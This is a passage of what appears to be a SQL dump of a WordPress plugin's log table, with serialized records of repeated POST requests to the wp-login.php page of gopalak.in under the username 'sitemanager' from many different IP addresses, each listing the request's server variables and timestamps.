00:00:00'),(93927,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43656\";s:11:\"REMOTE_ADDR\";s:14:\"194.67.121.219\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745418260.0389421;s:12:\"REQUEST_TIME\";i:1745418260;}}','194.67.121.219',0,'2025-04-23 19:54:21','1970-01-01 00:00:00'),(93928,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45912\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.69.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745418635.331012;s:12:\"REQUEST_TIME\";i:1745418635;}}','195.161.69.18',0,'2025-04-23 20:00:37','1970-01-01 00:00:00'),(93929,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38026\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.40\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745419021.6248109;s:12:\"REQUEST_TIME\";i:1745419021;}}','164.160.91.40',0,'2025-04-23 20:07:03','1970-01-01 00:00:00'),(93930,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33736\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.201.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745419401.1688299;s:12:\"REQUEST_TIME\";i:1745419401;}}','199.188.201.3',0,'2025-04-23 20:13:23','1970-01-01 00:00:00'),(93931,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51134\";s:11:\"REMOTE_ADDR\";s:15:\"173.212.207.177\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745419778.6512511;s:12:\"REQUEST_TIME\";i:1745419778;}}','173.212.207.177',0,'2025-04-23 20:19:40','1970-01-01 00:00:00'),(93932,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38638\";s:11:\"REMOTE_ADDR\";s:13:\"192.3.207.218\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745420159.7886679;s:12:\"REQUEST_TIME\";i:1745420159;}}','192.3.207.218',0,'2025-04-23 20:26:01','1970-01-01 00:00:00'),(93933,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58706\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745420919.6785381;s:12:\"REQUEST_TIME\";i:1745420919;}}','23.239.27.53',0,'2025-04-23 20:38:41','1970-01-01 00:00:00'),(93934,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48590\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745421301.34341;s:12:\"REQUEST_TIME\";i:1745421301;}}','68.65.120.171',0,'2025-04-23 20:45:03','1970-01-01 00:00:00'),(93935,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:4:\"2362\";s:11:\"REMOTE_ADDR\";s:13:\"83.149.93.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745421679.21421;s:12:\"REQUEST_TIME\";i:1745421679;}}','83.149.93.194',0,'2025-04-23 20:51:21','1970-01-01 00:00:00'),(93936,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41506\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.48.216\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745422432.6078529;s:12:\"REQUEST_TIME\";i:1745422432;}}','54.39.48.216',0,'2025-04-23 21:03:54','1970-01-01 00:00:00'),(93937,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 